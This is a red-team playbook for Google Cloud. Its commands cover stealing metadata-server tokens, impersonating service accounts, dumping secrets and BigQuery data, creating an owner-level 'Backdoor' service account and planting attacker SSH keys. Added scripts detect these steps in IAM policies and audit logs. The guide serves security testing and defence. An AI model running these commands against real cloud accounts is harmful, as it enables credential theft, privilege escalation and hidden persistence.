GCP

This playbook outlines offensive security techniques in Google Cloud Platform (GCP). It is structured around the red teaming lifecycle: reconnaissance, exploitation, privilege escalation, lateral move

1. GCP Cloud Overview

Core Components

  • Google Cloud IAM – Identity and Access Management (users, service accounts, roles, policies).

  • Projects – Organizational units that contain resources.

  • Service Accounts – Identities for workloads (VMs, functions, apps).

  • Cloud Resource Hierarchy – Org → Folders → Projects → Resources.

Planes of Access

  • Control Plane – Google Cloud Console, Cloud SDK (gcloud), REST APIs.

  • Data Plane – Actual workloads (VMs, buckets, databases).

🔑 Security Insight:

  • Compromise of control-plane credentials grants everything that identity holds; an Owner or Organization Admin identity means full takeover.

  • Compromise of a service account grants its roles on the resources where it is bound (usually project scope), which is often escalatable through key creation, actAs or impersonation.


2. Authentication & Credential Types

2.1 User Accounts

  • Human identities (Google accounts, Cloud Identity or Workspace users).

  • Auth via OAuth2 (gcloud auth login); the resulting credentials are cached under ~/.config/gcloud and are a common find on a compromised workstation.

2.2 Service Accounts

  • Non-human principals for apps/VMs.

  • Auth via long-lived JSON key files (gcloud auth activate-service-account --key-file) or, when the SA is attached to a resource, short-lived tokens from the Metadata Server.

2.3 Access Tokens

  • OAuth2 bearer tokens (short-lived, valid for one hour by default).

  • Commonly abused via SSRF → metadata server. The metadata server rejects requests without the Metadata-Flavor: Google header, so a usable SSRF must let the attacker set request headers (or the vulnerable app must already add it).

Get token inside VM

curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

3. Enumeration

3.1 Identity Enumeration

Check current active account:

gcloud auth list

Get project ID:

gcloud config get-value project

List the IAM policy for a project (project-level bindings only; roles inherited from the folder or organization do not appear here, so check those scopes separately with gcloud organizations get-iam-policy and gcloud resource-manager folders get-iam-policy):

gcloud projects get-iam-policy <project-id> --format=json

Find the roles held by a specific service account (an exact member match; jq's contains() is a substring test and also matches e.g. old-dev-sa@...):

gcloud projects get-iam-policy <project-id> --format=json \
  | jq -r '.bindings[] | select(any(.members[]; . == "serviceAccount:dev-sa@<project>.iam.gserviceaccount.com")) | .role'

3.2 Service Account Enumeration

List all service accounts in a project:

gcloud iam service-accounts list --project <project-id>

Get details about a service account:

gcloud iam service-accounts describe <sa-name>@<project>.iam.gserviceaccount.com

List keys associated with a service account:

gcloud iam service-accounts keys list --iam-account <sa-name>@<project>.iam.gserviceaccount.com

3.3 Storage Enumeration

List storage buckets:

gcloud storage buckets list --project <project-id>

List objects in a bucket:

gcloud storage objects list gs://<bucket-name>

Download file from bucket:

gcloud storage cp gs://<bucket-name>/<object> ./localfile

4. Exploitation

4.1 Metadata Service Abuse (IMDS Equivalent)

Inside a VM, access the metadata endpoint (the Metadata-Flavor header is mandatory):

curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

Use the token with gcloud. There is no gcloud subcommand that "activates" a bare access token; write it to a file and pass the global --access-token-file flag (or export it in CLOUDSDK_AUTH_ACCESS_TOKEN):

curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google" | jq -r .access_token > token.txt

gcloud projects list --access-token-file token.txt

What the token can do is bounded by both the SA's IAM roles and the OAuth scopes configured on the instance; read .../service-accounts/default/scopes before assuming a role is usable.

4.2 Using Leaked Tokens

If the attacker has a token (e.g. from logs or SSRF), save it and hand it to gcloud through the environment variable:

echo "<token>" > token.txt
export CLOUDSDK_AUTH_ACCESS_TOKEN="$(cat token.txt)"

Example (from a CTF-like scenario), using the equivalent per-command flag:

gcloud projects get-iam-policy <project-id> --format=json --access-token-file token.txt

4.3 Privilege Escalation via Service Accounts

Direct impersonation with --impersonate-service-account requires iam.serviceAccounts.getAccessToken on the target SA, which roles/iam.serviceAccountTokenCreator grants (roles/editor by itself does not). Other roles give indirect paths: roles/iam.serviceAccountUser (actAs) lets the attacker deploy a VM or Cloud Function that runs as the target SA, and roles/editor or roles/iam.serviceAccountKeyAdmin lets them mint a new long-lived key for it with gcloud iam service-accounts keys create.

gcloud auth print-access-token --impersonate-service-account=<target-sa>@<project>.iam.gserviceaccount.com
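The role lookups in 3.1 and the escalation check above are easier to repeat across many projects offline. The script below is an added example for this playbook, not code from the page or from Google: it consumes the JSON written by gcloud projects get-iam-policy / gcloud organizations get-iam-policy --format=json, reports every binding that names a principal (including inherited org/folder scopes and allUsers/allAuthenticatedUsers wildcards), and flags the roles that give an escalation path. SAMPLE_POLICIES is constructed data, and ESCALATION_ROLES is this author's non-exhaustive starting list; group membership is not resolved.

```python
"""Offline IAM policy analysis for a single principal across the hierarchy.

Added example, not part of the original playbook. Input: 'scope=file.json'
pairs where file.json is the output of
  gcloud projects get-iam-policy <project-id> --format=json
  gcloud organizations get-iam-policy <org-id> --format=json
With no arguments the constructed SAMPLE_POLICIES below are analysed.
"""
import json
import sys

# Roles that let a principal become another service account or rewrite IAM
# policy. Assumption: a common starting set, not a complete catalogue.
ESCALATION_ROLES = {
    "roles/owner": "full control of the resource, including its IAM policy",
    "roles/editor": "can create service-account keys and actAs service accounts",
    "roles/iam.serviceAccountTokenCreator": "can mint access tokens (direct impersonation)",
    "roles/iam.serviceAccountKeyAdmin": "can create long-lived service-account keys",
    "roles/iam.serviceAccountUser": "actAs: deploy a VM or function that runs as the SA",
    "roles/iam.securityAdmin": "can set IAM policy",
    "roles/resourcemanager.projectIamAdmin": "can set project IAM policy",
}

WILDCARD_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

# Constructed sample data in the shape gcloud prints: an org-level policy
# (inherited by every project beneath it) and one project policy.
SAMPLE_POLICIES = {
    "organizations/123456789012": {
        "bindings": [
            {"role": "roles/resourcemanager.folderViewer",
             "members": ["serviceAccount:dev-sa@example-proj.iam.gserviceaccount.com"]},
        ]
    },
    "projects/example-proj": {
        "bindings": [
            {"role": "roles/viewer",
             "members": ["serviceAccount:dev-sa@example-proj.iam.gserviceaccount.com",
                         "user:alice@example.com"]},
            {"role": "roles/iam.serviceAccountTokenCreator",
             "members": ["serviceAccount:dev-sa@example-proj.iam.gserviceaccount.com"],
             "condition": {"title": "weekdays-only", "expression": "<constructed>"}},
            {"role": "roles/owner", "members": ["user:alice@example.com"]},
            {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
        ]
    },
}


def roles_for_member(policies, member):
    """Return [(scope, role, is_conditional)] for every binding that names
    `member` directly or via allUsers/allAuthenticatedUsers. Org and folder
    bindings are inherited by the projects below them, so all scopes are
    reported. Group membership is not resolved (needs the Directory API)."""
    matches = []
    for scope, policy in policies.items():
        for binding in policy.get("bindings", []):
            members = set(binding.get("members", []))
            if member in members or members & WILDCARD_MEMBERS:
                matches.append((scope, binding["role"], "condition" in binding))
    return matches


def escalation_paths(policies, member):
    """Subset of roles_for_member() that are in ESCALATION_ROLES, with the reason."""
    return [(scope, role, cond, ESCALATION_ROLES[role])
            for scope, role, cond in roles_for_member(policies, member)
            if role in ESCALATION_ROLES]


def load_policies(specs):
    """specs: 'scope=file.json' strings, e.g. projects/example-proj=policy.json."""
    policies = {}
    for spec in specs:
        scope, path = spec.split("=", 1)
        with open(path) as fh:
            policies[scope] = json.load(fh)
    return policies


if __name__ == "__main__":
    member = sys.argv[1] if len(sys.argv) > 1 else \
        "serviceAccount:dev-sa@example-proj.iam.gserviceaccount.com"
    policies = load_policies(sys.argv[2:]) if len(sys.argv) > 2 else SAMPLE_POLICIES
    for scope, role, cond in roles_for_member(policies, member):
        print(f"{scope:32} {role}{'  [conditional]' if cond else ''}")
    for scope, role, cond, why in escalation_paths(policies, member):
        print(f"ESCALATION via {role} at {scope}: {why}")
```

Conditional bindings are reported but not evaluated: a conditional serviceAccountTokenCreator grant is still a path worth testing with --impersonate-service-account, it just may only work inside the condition's window.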

5. Post-Exploitation

5.1 Secrets (Secret Manager / Cloud KMS)

If Secret Manager is readable (roles/secretmanager.secretAccessor on the secret or the project):

gcloud secrets list --project <project-id>
gcloud secrets versions access latest --secret=<secret-name> --project <project-id>

Cloud KMS key material cannot be exported, but decrypt permission on a key (roles/cloudkms.cryptoKeyDecrypter) lets the attacker unwrap anything encrypted with it via gcloud kms decrypt.

5.2 BigQuery Data Dumping

There is no gcloud bigquery command group; BigQuery is driven with the bq CLI shipped in the same SDK, which uses the same cached credentials:

bq ls --project_id=<project-id>
bq ls <project-id>:<dataset>
bq show --schema <project-id>:<dataset>.<table>
bq head -n 20 <project-id>:<dataset>.<table>

6. Lateral Movement

  • Use a compromised service account to pivot into other projects: IAM bindings can name a principal from any project, so list every project the token can see (gcloud projects list) and repeat the policy checks there.

  • Enumerate organization-level roles (inherited by every folder and project beneath the org):

gcloud organizations get-iam-policy <org-id> --format=json

  • Abuse roles like roles/resourcemanager.folderViewer (hierarchy discovery) or roles/resourcemanager.projectMover (moving a project under a folder whose policy the attacker controls, so the project inherits those bindings) for movement.


7. Persistence

  • Create a new service account and bind it to a role (both steps land in Admin Activity audit logs as CreateServiceAccount and SetIamPolicy):

gcloud iam service-accounts create attacker-sa --display-name "Backdoor"
gcloud projects add-iam-policy-binding <project-id> \
  --member="serviceAccount:attacker-sa@<project-id>.iam.gserviceaccount.com" \
  --role="roles/owner"

  • Add an SSH key to a compromised VM instance. The value is "<username>:<authorized_keys line>", and add-metadata replaces the whole ssh-keys value rather than appending, so read the existing keys first and include them, or legitimate users lose access and the change gets noticed. Instances with OS Login enabled ignore metadata keys.

gcloud compute instances add-metadata <vm-name> --zone <zone> \
  --metadata ssh-keys="attacker:ssh-ed25519 <public-key> attacker"

8. Detection & Mitigation

  • Monitor IAM policy changes (SetIamPolicy), service-account key creation and impersonation (GenerateAccessToken) in Cloud Audit Logs; impersonation is a Data Access log and must be enabled explicitly for the IAM Credentials API.

  • Restrict service account privileges (least privilege); in particular do not run workloads on the default Compute Engine SA with roles/editor.

  • The metadata server is link-local and cannot be firewalled from inside the VPC; reduce what a stolen token can do (narrow OAuth scopes and SA roles) and keep SSRF-prone applications from reaching metadata.google.internal / 169.254.169.254.

  • Prefer short-lived credentials; block user-managed keys with the organization policy constraint constraints/iam.disableServiceAccountKeyCreation and rotate any that must exist.

  • Enable VPC Service Controls to limit data exfiltration and cross-project access.
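The first bullet is concrete enough to turn into a detection pass. The script below is an added example, not part of the original page or any Google tooling: it reads the JSON array printed by gcloud logging read ... --format=json and flags the events this playbook produces (sensitive or public IAM grants via SetIamPolicy bindingDeltas, service-account key creation, GenerateAccessToken impersonation, instance-metadata changes). The service and method names are the ones Cloud Audit Logs record; SAMPLE_ENTRIES are constructed and trimmed to the fields the rules read, and SENSITIVE_ROLES is this author's starting list.

```python
"""Scan Cloud Audit Log entries for the IAM, key, impersonation and metadata
events used in this playbook.

Added example, not part of the original page. Usage:
  gcloud logging read 'logName:cloudaudit.googleapis.com' --format=json | python3 audit_scan.py
With no piped input the constructed SAMPLE_ENTRIES are scanned.
"""
import json
import sys

# Assumption: a starting list of roles whose grant should always be reviewed.
SENSITIVE_ROLES = {
    "roles/owner", "roles/editor", "roles/iam.serviceAccountTokenCreator",
    "roles/iam.serviceAccountKeyAdmin", "roles/iam.serviceAccountUser",
    "roles/iam.securityAdmin", "roles/resourcemanager.projectIamAdmin",
}
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

# protoPayload.methodName -> what it means for this playbook
WATCHED_METHODS = {
    "google.iam.admin.v1.CreateServiceAccountKey": "long-lived SA key created (persistence)",
    "google.iam.admin.v1.CreateServiceAccount": "new service account created",
    "GenerateAccessToken": "SA impersonation (IAM Credentials data-access log, must be enabled)",
    "v1.compute.instances.setMetadata": "instance metadata changed (ssh-keys / startup-script)",
}

SA = "attacker-sa@example-proj.iam.gserviceaccount.com"
# Constructed entries, trimmed to the fields the rules use.
SAMPLE_ENTRIES = [
    {"timestamp": "2024-01-01T10:00:00Z", "protoPayload": {
        "serviceName": "cloudresourcemanager.googleapis.com", "methodName": "SetIamPolicy",
        "resourceName": "projects/example-proj",
        "authenticationInfo": {"principalEmail": "alice@example.com"},
        "serviceData": {"policyDelta": {"bindingDeltas": [
            {"action": "ADD", "role": "roles/owner", "member": "serviceAccount:" + SA},
            {"action": "REMOVE", "role": "roles/viewer", "member": "user:bob@example.com"}]}}}},
    {"timestamp": "2024-01-01T10:01:00Z", "protoPayload": {
        "serviceName": "iam.googleapis.com",
        "methodName": "google.iam.admin.v1.CreateServiceAccountKey",
        "resourceName": "projects/-/serviceAccounts/" + SA,
        "authenticationInfo": {"principalEmail": SA}}},
    {"timestamp": "2024-01-01T10:02:00Z", "protoPayload": {
        "serviceName": "iamcredentials.googleapis.com", "methodName": "GenerateAccessToken",
        "resourceName": "projects/-/serviceAccounts/target-sa@example-proj.iam.gserviceaccount.com",
        "authenticationInfo": {"principalEmail": "dev-sa@example-proj.iam.gserviceaccount.com"}}},
    {"timestamp": "2024-01-01T10:03:00Z", "protoPayload": {
        "serviceName": "compute.googleapis.com", "methodName": "v1.compute.instances.setMetadata",
        "resourceName": "projects/example-proj/zones/us-central1-a/instances/web-1",
        "authenticationInfo": {"principalEmail": SA}}},
    # Benign noise: an object read and a viewer grant.
    {"timestamp": "2024-01-01T10:04:00Z", "protoPayload": {
        "serviceName": "storage.googleapis.com", "methodName": "storage.objects.get",
        "resourceName": "projects/_/buckets/example-bucket/objects/readme.txt",
        "authenticationInfo": {"principalEmail": "alice@example.com"}}},
    {"timestamp": "2024-01-01T10:05:00Z", "protoPayload": {
        "serviceName": "cloudresourcemanager.googleapis.com", "methodName": "SetIamPolicy",
        "resourceName": "projects/example-proj",
        "authenticationInfo": {"principalEmail": "alice@example.com"},
        "serviceData": {"policyDelta": {"bindingDeltas": [
            {"action": "ADD", "role": "roles/viewer", "member": "user:carol@example.com"}]}}}},
]


def analyze(entry):
    """Return a list of finding strings for one audit log entry (empty if benign)."""
    p = entry.get("protoPayload", {})
    method = p.get("methodName", "")
    actor = p.get("authenticationInfo", {}).get("principalEmail", "<unknown>")
    target = p.get("resourceName", "<unknown>")
    findings = []
    if method == "SetIamPolicy":
        # bindingDeltas lists each ADD/REMOVE the call made; only ADDs of
        # sensitive roles, or any grant to a public member, are interesting.
        deltas = p.get("serviceData", {}).get("policyDelta", {}).get("bindingDeltas", [])
        for d in deltas:
            if d.get("action") != "ADD":
                continue
            if d.get("role") in SENSITIVE_ROLES or d.get("member") in PUBLIC_MEMBERS:
                findings.append(f"{actor} granted {d['role']} to {d['member']} on {target}")
    elif method in WATCHED_METHODS:
        findings.append(f"{actor}: {WATCHED_METHODS[method]} on {target}")
    return findings


def scan(entries):
    """Return [(timestamp, finding)] in log order."""
    return [(e.get("timestamp"), f) for e in entries for f in analyze(e)]


if __name__ == "__main__":
    entries = SAMPLE_ENTRIES if sys.stdin.isatty() else json.load(sys.stdin)
    for ts, finding in scan(entries):
        print(ts, finding)
```

The SetIamPolicy rule keys on bindingDeltas rather than on the full policy in the request, so a call that only removes bindings produces no alert; a production rule would also baseline expected actors (deployment pipelines) to cut noise.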
